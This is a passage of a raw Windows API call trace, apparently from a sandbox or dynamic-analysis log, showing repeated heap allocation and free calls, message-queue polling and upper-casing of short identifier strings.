hHeap=0x2af0000) returned 1 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0154.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0154.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0154.038] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0154.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0154.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0154.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0154.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0154.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0154.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0154.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0154.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0154.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0154.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0154.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0154.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0154.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0154.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0154.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0154.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0154.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0154.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0154.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0154.040] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0154.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0154.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0154.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0154.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0154.040] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0154.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0154.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0154.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0154.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0154.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0154.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0154.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0154.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0154.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0154.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0154.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0154.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0154.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0154.042] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0154.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0154.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0154.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0154.042] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0154.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0154.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0154.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0154.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0154.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0154.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0154.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0154.042] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0154.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0154.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0154.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0154.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0154.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0154.051] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0154.052] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0154.052] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0154.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0154.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa990 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74820 [0154.052] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0154.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0154.052] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0154.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0154.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0154.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0154.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0154.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0154.052] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0154.053] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74820 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0154.054] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0154.054] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0154.054] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0154.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0154.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa870 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743a0 [0154.054] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0154.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0154.054] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0154.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0154.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0154.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0154.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0154.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0154.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0154.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0154.055] PeekMessageW (in: 